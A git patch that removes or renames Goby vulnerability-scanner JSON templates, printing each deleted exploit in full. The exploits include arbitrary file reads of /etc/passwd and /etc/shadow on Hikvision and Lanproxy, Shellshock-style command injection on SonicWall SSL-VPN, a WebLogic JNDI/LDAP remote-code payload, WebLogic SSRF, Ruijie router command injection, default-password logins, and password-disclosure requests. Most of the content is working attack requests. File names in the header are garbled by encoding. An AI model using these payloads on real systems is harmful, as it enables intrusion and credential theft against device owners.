From 95c480e0f90cd87f8eaa5883f5dabdd90b21a63e Mon Sep 17 00:00:00 2001 From: test Date: Fri, 25 Nov 2022 18:58:59 +0800 Subject: [PATCH] 1 --- ...ION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json | 78 ---------- json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json | 78 ---------- ...ó╨╣┬╢┬⌐╢┤ CNVD-2021-10543.json => MessageSolution CNVD-2021-10543.json} | 0 ...r-╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json => NETGEAR-DGND3700v2rce.json} | 0 ...╨╨┬⌐╢┤-ú¿CVE-2022-2274ú⌐.json => OpenSSL CVE-2022-2274.json} | 0 json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json | 82 ----------- ...»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json | 55 ------- ...c LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json | 87 ----------- json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json | 101 ------------- json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json | 60 -------- json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json | 53 ------- ...▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json | 84 ----------- ...¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json | 70 --------- ...▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json | 137 ------------------ ...CVE-2020-10987ú⌐.json => 腾达路由器 setusbunload 命令执行漏洞 (CVE-2020-10987).json} | 0 15 files changed, 885 deletions(-) delete mode 100644 json/HIKVISION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json delete mode 100644 json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json rename json/{MessageSolution ╙╩╝■╣Θ╡╡╧╡═│EEA ╨┼╧ó╨╣┬╢┬⌐╢┤ CNVD-2021-10543.json => MessageSolution CNVD-2021-10543.json} (100%) rename json/{NETGEAR-DGND3700v2-┬╖╙╔╞≈-c4_IPAddr-╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json => NETGEAR-DGND3700v2rce.json} (100%) rename json/{OpenSSL╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤-ú¿CVE-2022-2274ú⌐.json => OpenSSL CVE-2022-2274.json} (100%) delete mode 100644 json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json delete mode 100644 json/Wayos AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json delete mode 100644 json/Weblogic LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json delete mode 100644 json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json delete mode 100644 json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json delete mode 100644 json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json delete mode 100644 json/╖½╚φ▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json delete mode 100644 json/╖Σ═°╗Ñ┴¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json delete mode 100644 json/╚±╜▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json rename json/{╠┌┤∩┬╖╙╔╞≈-setusbunload-├ⁿ┴ε╓┤╨╨┬⌐╢┤-ú¿CVE-2020-10987ú⌐.json => 腾达路由器 setusbunload 命令执行漏洞 (CVE-2020-10987).json} (100%) diff --git a/json/HIKVISION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json b/json/HIKVISION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json deleted file mode 100644 index 5bd4678..0000000 --- a/json/HIKVISION ╩╙╞╡▒α┬δ╔Φ▒╕╜╙╚δ═°╣╪ ╚╬╥Γ╬─╝■╧┬╘╪.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "Name": "HIKVISION 视频编码设备接入网关 任意文件下载", - "Level": "1", - "Tags": [ - "任意文件下载" - ], - "GobyQuery": "(app=\"Hikvision-Video-coding-device-access-gateway\" || title=\"视频编码设备接入网关\")", - "Description": "海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n\n访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件", - "Product": "HIKVISION 视频编码设备接入网关", - "Homepage": "https://www.hikvision.com/cn/", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Filename", - "type": "select", - "value": "../web/html/data/saveUserInfo.php,../../../../../../WINDOWS/system32/drivers/etc/hosts,../web/html/serverLog/downFile.php", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "$file_name=", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/serverLog/downFile.php?fileName={{{Filename}}}", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-02-06 14:59:46", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json b/json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json deleted file mode 100644 index 044d7f3..0000000 --- a/json/Lanproxy ─┐┬╝▒Θ└·┬⌐╢┤ CVE-2021-3019.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "Name": "Lanproxy 目录遍历漏洞 CVE-2021-3019", - "Level": "2", - "Tags": [ - "目录遍历" - ], - "GobyQuery": "header=\"Server: LPS-0.1\"", - "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。", - "Product": "Lanproxy 0.1", - "Homepage": "https://github.com/ffay/lanproxy", - "Author": "PeiQi", - "Impact": "
咩咩咩🐑
", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Filename", - "type": "select", - "value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/../conf/config.properties", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "server.ssl", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "{{{Filename}}}", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-01-22 18:20:52", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/MessageSolution ╙╩╝■╣Θ╡╡╧╡═│EEA ╨┼╧ó╨╣┬╢┬⌐╢┤ CNVD-2021-10543.json b/json/MessageSolution CNVD-2021-10543.json similarity index 100% rename from json/MessageSolution ╙╩╝■╣Θ╡╡╧╡═│EEA ╨┼╧ó╨╣┬╢┬⌐╢┤ CNVD-2021-10543.json rename to json/MessageSolution CNVD-2021-10543.json diff --git a/json/NETGEAR-DGND3700v2-┬╖╙╔╞≈-c4_IPAddr-╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json b/json/NETGEAR-DGND3700v2rce.json similarity index 100% rename from json/NETGEAR-DGND3700v2-┬╖╙╔╞≈-c4_IPAddr-╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json rename to json/NETGEAR-DGND3700v2rce.json diff --git a/json/OpenSSL╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤-ú¿CVE-2022-2274ú⌐.json b/json/OpenSSL CVE-2022-2274.json similarity index 100% rename from json/OpenSSL╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤-ú¿CVE-2022-2274ú⌐.json rename to json/OpenSSL CVE-2022-2274.json diff --git a/json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json b/json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json deleted file mode 100644 index 98e618f..0000000 --- a/json/SonicWall SSL-VPN ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "Name": "SonicWall SSL-VPN 远程命令执行漏洞", - "Level": "3", - "Tags": [ - "RCE" - ], - "GobyQuery": "(app=\"SonicWALL-Company's-product\" || app=\"SonicWALL-SSL-VPN\")", - "Description": "SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞", - "Product": "SonicWall SSL-VPN", - "Homepage": "https://www.sonicwall.com/", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "cat /etc/passwd", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/cgi-bin/jarrewrite.sh", - "follow_redirect": true, - "header": { - "User-Agent": "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" - }, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/cgi-bin/jarrewrite.sh", - "follow_redirect": true, - "header": { - "User-Agent": "() { :; }; echo ; /bin/bash -c '{{{Cmd}}}'" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-01-26 15:28:34", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/Wayos AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json b/json/Wayos AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json deleted file mode 100644 index f0131cd..0000000 --- a/json/Wayos AC╝»╓╨╣▄└φ╧╡═│─¼╚╧╚⌡┐┌┴ε CNVD-2021-00876.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "Name": "Wayos AC集中管理系统默认弱口令 CNVD-2021-00876", - "Level": "2", - "Tags": [ - "弱口令" - ], - "GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"", - "Description": "深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商,主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。\n\nAC集中管理平台存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。\n弱口令 admin:admin", - "Product": "深圳维盟科技股份有限公司AC集中管理平台", - "Homepage": "http://www.wayos.com/", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/login.cgi", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "user=admin&password=admin" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "not contains", - "value": "flag=0", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "PostTime": "2021-02-07 23:13:20", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/Weblogic LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json b/json/Weblogic LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json deleted file mode 100644 index 3038391..0000000 --- a/json/Weblogic LDAP ╘╢│╠┤·┬δ╓┤╨╨┬⌐╢┤ CVE-2021-2109.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "Name": "Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109", - "Level": "3", - "Tags": [ - "RCE" - ], - "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"", - "Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0", - "Product": "WebLogicd", - "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html", - "Author": "PeiQi", - "Impact": "

咩咩咩🐑

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - }, - { - "name": "Ldap", - "type": "input", - "value": "ldap://xxx.xxx.xxx;xxx:1389", - "show": "" - } - - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/console/css/%252e%252e%252f/consolejndi.portal?", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "JNDI", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)", - "follow_redirect": true, - "header": { - "cmd": "{{{Cmd}}}" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-01-22 13:55:45", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json b/json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json deleted file mode 100644 index 852ef48..0000000 --- a/json/Weblogic SSRF┬⌐╢┤ CVE-2014-4210.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "Name": "Weblogic SSRF漏洞 CVE-2014-4210", - "Level": "2", - "Tags": [ - "SSRF" - ], - "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"", - "Description": "Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,此漏洞可通过HTTP协议利用,未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001", - "Product": "Oracle WebLogic Server", - "Homepage": "https://www.oracle.com", - "Author": "PeiQi", - "Impact": "

咩咩咩🐑

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp":true, - "ExpParams":[ - { - "name":"payload", - "type":"input", - "value":"127.0.0.1:7001", - "show":"" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/uddiexplorer/SearchPublicRegistries.jsp", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "Search", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "OR", - { - "Request": { - "method": "GET", - "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - - "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"] - }, - { - "Request": { - "method": "GET", - "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - - "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"] - }, - { - "Request": { - "method": "GET", - "uri": "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - - "SetVariable": ["output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)"] - } - ], - "PostTime": "2021-01-23 20:47:39", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json b/json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json deleted file mode 100644 index f5b22fd..0000000 --- a/json/XXL-JOB ╚╬╬±╡≈╢╚╓╨╨─ ║≤╠¿─¼╚╧╚⌡┐┌┴ε.json +++ /dev/null @@ -1,60 +0,0 @@ -{ - "Name": "XXL-JOB 任务调度中心 后台默认弱口令", - "Level": "2", - "Tags": [], - "GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")", - "Description": "", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/login", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" - }, - "data_type": "text", - "data": "userName=admin&password=123456" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "not contains", - "value": "500", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "PostTime": "2021-03-17 12:24:54", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json b/json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json deleted file mode 100644 index d62f588..0000000 --- a/json/╓┬╘╢OA A6 ╩²╛▌┐Γ├⌠╕╨╨┼╧ó╨╣┬╢.json +++ /dev/null @@ -1,53 +0,0 @@ -{ - "Name": "致远OA A6 数据库敏感信息泄露", - "Level": "1", - "Tags": [ - "敏感信息泄露" - ], - "GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))", - "Description": "致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5", - "Product": "致远OA A6", - "Homepage": "PeiQi", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/yyoa/createMysql.jsp", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "PostTime": "2021-03-18 21:36:42", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/╖½╚φ▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json b/json/╖½╚φ▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json deleted file mode 100644 index 2eb8885..0000000 --- a/json/╖½╚φ▒¿▒φ v8.0 ╚╬╥Γ╬─╝■╢┴╚í┬⌐╢┤ CNVD-2018-04757.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "Name": "帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757", - "Level": "1", - "Tags": [ - "任意文件读取" - ], - "GobyQuery": "app=\"fanruansem-FineReport\"", - "Description": "FineReport报表软件是一款纯Java编写的,集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。\n\nFineReport 8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。", - "Product": "FineReport 8.0版本", - "Homepage": "PeiQi", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "ScanSteps": [ - "OR", - { - "Request": { - "method": "GET", - "uri": "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "CDATA", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "GET", - "uri": "/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "CDATA", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "PostTime": "2021-03-21 19:44:01", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/╖Σ═°╗Ñ┴¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json b/json/╖Σ═°╗Ñ┴¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json deleted file mode 100644 index f2f4667..0000000 --- a/json/╖Σ═°╗Ñ┴¬ ╞≤╥╡╝╢┬╖╙╔╞≈v4.31 ├▄┬δ╨╣┬╢┬⌐╢┤ CVE-2019-16313.json +++ /dev/null @@ -1,70 +0,0 @@ -{ - "Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313", - "Level": "2", - "Tags": [ - "账号密码泄露" - ], - "GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")", - "Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器", - "Product": "蜂网互联企业级路由器v4.31", - "Homepage": "http://www.ifw8.cn/", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/action/usermanager.htm", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "pwd", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/action/usermanager.htm", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-02-21 11:22:17", - "GobyVersion": "1.8.237" -} \ No newline at end of file diff --git a/json/╚±╜▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json b/json/╚±╜▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json deleted file mode 100644 index 1250826..0000000 --- a/json/╚±╜▌NBR┬╖╙╔╞≈ EWEB═°╣▄╧╡═│ ╘╢│╠├ⁿ┴ε╓┤╨╨┬⌐╢┤.json +++ /dev/null @@ -1,137 +0,0 @@ -{ - "Name": "锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞", - "Level": "3", - "Tags": [ - "远程命令执行" - ], - "GobyQuery": "(app=\"Ruijie-EG\" || title=\"锐捷网络-EWEB网管系统\" || app=\"Ruijie--EWEB\")", - "Description": "锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限", - "Product": "锐捷NBR路由器 EWEB网管系统", - "Homepage": "http://www.ruijie.com.cn/", - "Author": "PeiQi", - "Impact": "

🐏

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "cat /etc/passwd", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/guest_auth/guestIsUp.php", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "mac=1&ip=127.0.0.1|cat /etc/passwd > PeiQi.txt" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "GET", - "uri": "/guest_auth/guestIsUp.php", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "!=", - "value": "404", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "not contains", - "value": "File 